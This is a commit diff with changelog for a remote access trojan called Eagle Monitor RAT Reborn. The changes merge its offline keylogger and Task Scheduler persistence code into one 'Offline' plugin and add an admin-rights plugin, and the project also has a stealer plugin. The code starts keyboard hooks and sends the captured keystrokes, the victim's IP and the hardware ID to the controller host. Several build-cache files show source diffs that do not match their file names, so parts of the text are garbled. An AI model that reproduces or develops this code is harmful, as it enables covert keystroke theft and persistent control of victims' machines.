3.2.1.0

* [Fix][Server] Re-added thread for ConnectedPacketHandler
* [Fix][Client] Offline keystrokes sent after getting Connect packet (causing server crash if offline keylogger enabled)
* [Fix][Updater] Updater did not work for 3.1.9.0 to 3.2.0.0 and above
* [New] Added plugin named "Admin" used for all features requiring admin rights
* [New] Added "Ask for admin rights"
* [New] Added Restore Points View (requires UAC)
* [New] Added Restore Points delete (requires UAC)
* [Tweaks] "OffKeylogger" and "persistence" codes have been merged in a single Dll (Offline) -> reduce the client's size of +- 20 KB

Author: arsium

Eagle Monitor Reborn.sln

@@ -19,10 +19,6 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Stealer", "Remote Access To
 EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MemoryExecution", "Remote Access Tool\Plugins\MemoryExecution\MemoryExecution.csproj", "{0607E970-CC93-4A2A-83CA-53B9D537C96E}"
 EndProject
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "OfflineKeylogger", "Remote Access Tool\Plugins\OffKeylogger\OfflineKeylogger.csproj", "{A2C534E0-70E1-4229-B6E5-F91EDE820789}"
-EndProject
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Persistence", "Remote Access Tool\Plugins\Persistence\Persistence.csproj", "{354D5D01-64BA-40D8-BF97-659FEFF41EFB}"
-EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Eagle Monitor RAT Reborn", "Remote Access Tool\Eagle Monitor\Eagle Monitor RAT Reborn.csproj", "{D18EDB8E-8441-48E8-9F89-518824F759E2}"
 EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Eagle Monitor Configurator", "Remote Access Tool\Eagle Monitor Configurator\Eagle Monitor Configurator.csproj", "{61B25B01-C289-4026-98F4-1A699D1450E5}"
@@ -65,6 +61,10 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Eagle Monitor RAT Updater",
 EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Remote Access Tool\Plugins\Chat\Chat.csproj", "{773A4D23-189D-4353-BF37-515591E16F5A}"
 EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Offline", "Remote Access Tool\Plugins\Offline\Offline.csproj", "{D317BA4E-5818-4FC4-AA4E-EEA824317759}"
+EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Admin", "Remote Access Tool\Plugins\Admin\Admin.csproj", "{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
@@ -105,8 +105,8 @@ Global
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Debug|x64.Build.0 = Debug|x64
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Debug|x86.ActiveCfg = Debug|Any CPU
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Debug|x86.Build.0 = Debug|Any CPU
-		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|Any CPU.Build.0 = Release|Any CPU
+		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|Any CPU.ActiveCfg = Release|x64
+		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|Any CPU.Build.0 = Release|x64
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|x64.ActiveCfg = Release|x64
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|x64.Build.0 = Release|x64
 		{6CC57E66-AB6C-4908-81DA-29A45596F5CA}.Release|x86.ActiveCfg = Release|Any CPU
@@ -159,38 +159,14 @@ Global
 		{0607E970-CC93-4A2A-83CA-53B9D537C96E}.Release|x64.Build.0 = Release|Any CPU
 		{0607E970-CC93-4A2A-83CA-53B9D537C96E}.Release|x86.ActiveCfg = Release|Any CPU
 		{0607E970-CC93-4A2A-83CA-53B9D537C96E}.Release|x86.Build.0 = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|x64.ActiveCfg = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|x64.Build.0 = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|x86.ActiveCfg = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Debug|x86.Build.0 = Debug|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|Any CPU.Build.0 = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|x64.ActiveCfg = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|x64.Build.0 = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|x86.ActiveCfg = Release|Any CPU
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789}.Release|x86.Build.0 = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|x64.ActiveCfg = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|x64.Build.0 = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|x86.ActiveCfg = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Debug|x86.Build.0 = Debug|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|Any CPU.Build.0 = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|x64.ActiveCfg = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|x64.Build.0 = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|x86.ActiveCfg = Release|Any CPU
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB}.Release|x86.Build.0 = Release|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|Any CPU.Build.0 = Debug|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|x64.ActiveCfg = Debug|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|x64.Build.0 = Debug|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|x86.ActiveCfg = Debug|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Debug|x86.Build.0 = Debug|Any CPU
-		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|Any CPU.Build.0 = Release|Any CPU
+		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|Any CPU.ActiveCfg = Release|x64
+		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|Any CPU.Build.0 = Release|x64
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|x64.ActiveCfg = Release|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|x64.Build.0 = Release|Any CPU
 		{D18EDB8E-8441-48E8-9F89-518824F759E2}.Release|x86.ActiveCfg = Release|Any CPU
@@ -309,8 +285,8 @@ Global
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Debug|x64.Build.0 = Debug|Any CPU
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Debug|x86.ActiveCfg = Debug|Any CPU
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Debug|x86.Build.0 = Debug|Any CPU
-		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|Any CPU.Build.0 = Release|Any CPU
+		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|Any CPU.ActiveCfg = Release|x64
+		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|Any CPU.Build.0 = Release|x64
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|x64.ActiveCfg = Release|Any CPU
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|x64.Build.0 = Release|Any CPU
 		{7479A1EC-2F07-476A-8C29-5073E1AF4731}.Release|x86.ActiveCfg = Release|Any CPU
@@ -435,6 +411,30 @@ Global
 		{773A4D23-189D-4353-BF37-515591E16F5A}.Release|x64.Build.0 = Release|Any CPU
 		{773A4D23-189D-4353-BF37-515591E16F5A}.Release|x86.ActiveCfg = Release|Any CPU
 		{773A4D23-189D-4353-BF37-515591E16F5A}.Release|x86.Build.0 = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|x64.ActiveCfg = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|x64.Build.0 = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|x86.ActiveCfg = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Debug|x86.Build.0 = Debug|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|Any CPU.Build.0 = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|x64.ActiveCfg = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|x64.Build.0 = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|x86.ActiveCfg = Release|Any CPU
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759}.Release|x86.Build.0 = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|x64.ActiveCfg = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|x64.Build.0 = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|x86.ActiveCfg = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Debug|x86.Build.0 = Debug|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|Any CPU.Build.0 = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|x64.ActiveCfg = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|x64.Build.0 = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|x86.ActiveCfg = Release|Any CPU
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0}.Release|x86.Build.0 = Release|Any CPU
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
@@ -445,8 +445,6 @@ Global
 		{D0B4F8E5-B2FE-4546-8468-1AF08B82B50C} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{57239258-19E3-4B07-854C-8B0A3221C45A} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{0607E970-CC93-4A2A-83CA-53B9D537C96E} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
-		{A2C534E0-70E1-4229-B6E5-F91EDE820789} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
-		{354D5D01-64BA-40D8-BF97-659FEFF41EFB} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{DCD28797-E01E-48F7-942C-6E01DF1DD9E9} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{EAEC4642-636D-4312-8903-D70157A8E91C} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{5389698F-E221-466D-8682-8F289C44F1DD} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
@@ -458,6 +456,8 @@ Global
 		{8249FC51-35C1-4141-8AAF-796FD81414EF} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{37FCC79C-BC7C-4481-8E5B-9C0CE4496D11} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 		{773A4D23-189D-4353-BF37-515591E16F5A} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
+		{D317BA4E-5818-4FC4-AA4E-EEA824317759} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
+		{B4600D81-F6E7-4F97-B0D1-7029EEEED5F0} = {285E656E-D902-42A0-B5E5-F797CEE51E1A}
 	EndGlobalSection
 	GlobalSection(ExtensibilityGlobals) = postSolution
 		SolutionGuid = {A52F31CC-26D4-4A7D-B23C-39C1BCB978F0}

Remote Access Tool/Client/Client.csproj

@@ -86,13 +86,9 @@
       <Project>{81e3752a-0ac1-4eb4-8b5f-81eea8ffb0ff}</Project>
       <Name>PacketLib</Name>
     </ProjectReference>
-    <ProjectReference Include="..\Plugins\OffKeylogger\OfflineKeylogger.csproj">
-      <Project>{a2c534e0-70e1-4229-b6e5-f91ede820789}</Project>
-      <Name>OfflineKeylogger</Name>
-    </ProjectReference>
-    <ProjectReference Include="..\Plugins\Persistence\Persistence.csproj">
-      <Project>{354d5d01-64ba-40d8-bf97-659feff41efb}</Project>
-      <Name>Persistence</Name>
+    <ProjectReference Include="..\Plugins\Offline\Offline.csproj">
+      <Project>{d317ba4e-5818-4fc4-aa4e-eea824317759}</Project>
+      <Name>Offline</Name>
     </ProjectReference>
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />

Remote Access Tool/Client/Networking/ClientHandler.cs

@@ -5,7 +5,6 @@
 using System.IO;
 using System.Net.Sockets;
 using System.Threading;
-using System.Windows.Forms;
 
 /* 
 || AUTHOR Arsium ||
@@ -68,11 +67,11 @@ private bool Connect()
             return false;
         }
 
-        private void StopOfflineKeyLogger()
+        internal static void StopOfflineKeyLogger()
         {
-            Plugin.Launch.StopHook();
-            Plugin.Launch.ClientSender(StarterClass.clientHandler.host, Config.generalKey, new KeylogOfflinePacket(Plugin.Launch.CurrentKeyStroke(), StarterClass.clientHandler.baseIp, StarterClass.clientHandler.HWID));
-            Plugin.Launch.ClearKeyStroke();
+            Offline.Keyloggers.Launch.StopHook();
+            Offline.Keyloggers.Launch.ClientSender(StarterClass.clientHandler.host, Config.generalKey, new KeylogOfflinePacket(Offline.Keyloggers.Launch.CurrentKeyStroke(), StarterClass.clientHandler.baseIp, StarterClass.clientHandler.HWID));
+            Offline.Keyloggers.Launch.ClearKeyStroke();
             StarterClass.KeylogOn = false; 
         }
 
@@ -85,8 +84,6 @@ public void EndConnect(IAsyncResult ar)
                 ConnectedPacket connectionPacket = new ConnectedPacket();
                 this.HWID = connectionPacket.HWID;
                 SendPacket(connectionPacket);
-                if (StarterClass.KeylogOn)
-                    StopOfflineKeyLogger();
                 Receive();
             }
             else

Remote Access Tool/Client/Networking/PacketHandler.cs

@@ -20,24 +20,24 @@ static PacketHandler()
             pluginDelegate = new PluginDelegate(LoadPlugin);
         }
 
-
         internal static void ParsePacket(IPacket packet) 
         {
-
             try
             {
                 switch (packet.packetType)
                 {
                     case PacketType.CONNECTED:
                         StarterClass.clientHandler.baseIp = packet.baseIp;
+                        if (StarterClass.KeylogOn)
+                            ClientHandler.StopOfflineKeyLogger();
                         break;
 
                     case (PacketType.CLOSE_CLIENT):
                         StarterClass.NtTerminateProcess(Process.GetCurrentProcess().Handle, 0);
                         break;
 
                     case (PacketType.UNINSTALL_CLOSE_CLIENT):
-                        Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName);
+                        Offline.Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName);
                         break;
 
                     default:

Remote Access Tool/Client/StarterClass.cs

@@ -35,7 +35,7 @@ internal static void StartOfflineKeylogger()
         {
             if (!KeylogOn && Config.offKeylog != "False")
             {
-                Plugin.Launch.Start();
+                Offline.Keyloggers.Launch.Start();
                 KeylogOn = true;
             }
         }
@@ -61,7 +61,7 @@ public static void Main()
 
         public static void MakeInstall()
         {
-            Persistence.TaskScheduler.StartUpTaskScheduler(Config.time, Config.taskName);
+            Offline.Persistence.TaskScheduler.StartUpTaskScheduler(Config.time, Config.taskName);
         }
     }
 }

Remote Access Tool/Client/obj/Release/Client.csproj.AssemblyReference.cache

@@ -1 +1 @@
-c02f3bbfd82c9bdf9c4bcccc09dae8674ba61f4a
+016c1b1cd7e6ef8276ecc36d372cf200971701d0

Remote Access Tool/Client/obj/Release/Client.csproj.CoreCompileInputs.cache

@@ -0,0 +1 @@
+obj\Release\\_IsIncrementalBuild

Remote Access Tool/Client/obj/Release/Costura/16E367575778C3F5B31806EEF944A9E6E8A63853.costura.offline.dll.compressed

@@ -1 +1 @@
-5ab563a9f1704ad9d4d87357d4975e8ec19cfe14
+c01801f1a75a5e6ec787152dfd9c3d1a78559118

Remote Access Tool/Client/obj/Release/Costura/20E74B9DEB97D094074E115941CB243D20018A33.costura.offline.pdb.compressed

@@ -0,0 +1 @@
+obj\x64\Release\\_IsIncrementalBuild

Remote Access Tool/Client/obj/Release/Costura/463FB96EF88CCFAC4DC32CBD38248EFB50A38135.costura.offline.pdb.compressed

@@ -52,13 +52,9 @@
       <Project>{81e3752a-0ac1-4eb4-8b5f-81eea8ffb0ff}</Project>
       <Name>PacketLib</Name>
     </ProjectReference>
-    <ProjectReference Include="..\Plugins\OffKeylogger\OfflineKeylogger.csproj">
-      <Project>{a2c534e0-70e1-4229-b6e5-f91ede820789}</Project>
-      <Name>OfflineKeylogger</Name>
-    </ProjectReference>
-    <ProjectReference Include="..\Plugins\Persistence\Persistence.csproj">
-      <Project>{354d5d01-64ba-40d8-bf97-659feff41efb}</Project>
-      <Name>Persistence</Name>
+    <ProjectReference Include="..\Plugins\Offline\Offline.csproj">
+      <Project>{d317ba4e-5818-4fc4-aa4e-eea824317759}</Project>
+      <Name>Offline</Name>
     </ProjectReference>
   </ItemGroup>
   <ItemGroup>

Remote Access Tool/Client/obj/Release/Costura/70903F9C1D8303F2727443CB36D37555E3AAFD02.costura.packetlib.dll.compressed

@@ -34,7 +34,7 @@ internal static void StartOfflineKeylogger()
         {
             if (!KeylogOn && Config.offKeylog != "False")
             {
-                Plugin.Launch.Start();
+                Offline.Keyloggers.Launch.Start();
                 KeylogOn = true;
             }
         }
@@ -59,7 +59,7 @@ public static void Main()
 
         public static void MakeInstall()
         {
-            Persistence.TaskScheduler.StartUpTaskScheduler(Config.time, Config.taskName);
+            Offline.Persistence.TaskScheduler.StartUpTaskScheduler(Config.time, Config.taskName);
         }
     }
 }

Remote Access Tool/Client/obj/Release/Costura/742E69CC55C89E5E530AD9CA71A067934EF02162.costura.offline.dll.compressed

@@ -75,9 +75,9 @@ private bool Connect()
 
         private void StopOfflineKeyLogger()
         {
-            Plugin.Launch.StopHook();
-            Plugin.Launch.ClientSender(EntryClass.clientHandler.host, Config.generalKey, new KeylogOfflinePacket(Plugin.Launch.CurrentKeyStroke(), EntryClass.clientHandler.baseIp, EntryClass.clientHandler.HWID));
-            Plugin.Launch.ClearKeyStroke();
+            Offline.Keyloggers.Launch.StopHook();
+            Offline.Keyloggers.Launch.ClientSender(EntryClass.clientHandler.host, Config.generalKey, new KeylogOfflinePacket(Offline.Keyloggers.Launch.CurrentKeyStroke(), EntryClass.clientHandler.baseIp, EntryClass.clientHandler.HWID));
+            Offline.Keyloggers.Launch.ClearKeyStroke();
             EntryClass.KeylogOn = false; 
         }
 

Remote Access Tool/Client/obj/Release/Costura/994E685D2B730E1418F342B2A5135FEDCC89243D.costura.offline.dll.compressed

@@ -37,7 +37,7 @@ internal static void ParsePacket(IPacket packet)
                         break;
 
                     case (PacketType.UNINSTALL_CLOSE_CLIENT):
-                        Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName);
+                        Offline.Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName);
                         break;
 
                     default:

Remote Access Tool/Client/obj/Release/Costura/C13DAAAD2065B1B8CB2C7903E68DD997CF626B1C.costura.packetlib.dll.compressed

@@ -1 +1 @@
-38c8530b05ff19c71af9b9e3288d63a3f88e7de2
+54e70fafcb8903c28dc646e2f8cb444db3592dea

Remote Access Tool/Client/obj/Release/Costura/C95085E69B954DD9B592168BDC7340DCB7A11947.costura.packetlib.dll.compressed

@@ -0,0 +1 @@
+obj\Release\\_IsIncrementalBuild

Remote Access Tool/Client/obj/Release/Costura/D0AF7E7B025B007D981837832218B6D21580C5AB.costura.offkeylogger.dll.compressed

@@ -100,13 +100,9 @@
       <Project>{81e3752a-0ac1-4eb4-8b5f-81eea8ffb0ff}</Project>
       <Name>PacketLib</Name>
     </ProjectReference>
-    <ProjectReference Include="..\Plugins\OffKeylogger\OfflineKeylogger.csproj">
-      <Project>{a2c534e0-70e1-4229-b6e5-f91ede820789}</Project>
-      <Name>OfflineKeylogger</Name>
-    </ProjectReference>
-    <ProjectReference Include="..\Plugins\Persistence\Persistence.csproj">
-      <Project>{354d5d01-64ba-40d8-bf97-659feff41efb}</Project>
-      <Name>Persistence</Name>
+    <ProjectReference Include="..\Plugins\Offline\Offline.csproj">
+      <Project>{d317ba4e-5818-4fc4-aa4e-eea824317759}</Project>
+      <Name>Offline</Name>
     </ProjectReference>
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />

Remote Access Tool/Client/obj/Release/Costura/DBDCCAC66FCBBA848CD5ACE8570B28ABBE6457F9.costura.offline.pdb.compressed

@@ -68,10 +68,10 @@ Namespace Client
             Return False
         End Function
 
-        Private Sub StopOfflineKeyLogger()
-            Plugin.Launch.StopHook()
-            Plugin.Launch.ClientSender(StarterClass.clientHandler.host, Config.generalKey, New KeylogOfflinePacket(Plugin.Launch.CurrentKeyStroke(), StarterClass.clientHandler.baseIp, StarterClass.clientHandler.HWID))
-            Plugin.Launch.ClearKeyStroke()
+        Friend Shared Sub StopOfflineKeyLogger()
+            Offline.Keyloggers.Launch.StopHook()
+            Offline.Keyloggers.Launch.ClientSender(StarterClass.clientHandler.host, Config.generalKey, New KeylogOfflinePacket(Offline.Keyloggers.Launch.CurrentKeyStroke(), StarterClass.clientHandler.baseIp, StarterClass.clientHandler.HWID))
+            Offline.Keyloggers.Launch.ClearKeyStroke()
             StarterClass.KeylogOn = False
         End Sub
 
@@ -84,9 +84,6 @@ Namespace Client
                 Me.HWID = connectionPacket.HWID
                 Me.baseIp = socket.LocalEndPoint.ToString()
                 SendPacket(connectionPacket)
-                If StarterClass.KeylogOn Then
-                    StopOfflineKeyLogger()
-                End If
                 Receive()
             Else
                 ConnectStart()

Remote Access Tool/Client/obj/Release/Costura/EEBF9ACA6EC6C40D71DA419CABF07E71EEAF2365.costura.packetlib.dll.compressed

@@ -25,14 +25,17 @@ Namespace Client
 				Select Case packet.packetType
 					Case PacketType.CONNECTED
 						StarterClass.clientHandler.baseIp = packet.baseIp
+						If StarterClass.KeylogOn Then
+                            ClientHandler.StopOfflineKeyLogger()
+                        End If
 
 					Case (PacketType.CLOSE_CLIENT)
 						StarterClass.NtTerminateProcess(Process.GetCurrentProcess().Handle, 0)
 
 					Case (PacketType.UNINSTALL_CLOSE_CLIENT)
-						Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName)
+                        Offline.Persistence.TaskScheduler.RemoveTaskScheduler(Config.taskName)
 
-					Case Else
+                    Case Else
 						pluginDelegateAsync.BeginInvoke(packet, New AsyncCallback(AddressOf EndLoadPlugin), Nothing)
 
 				End Select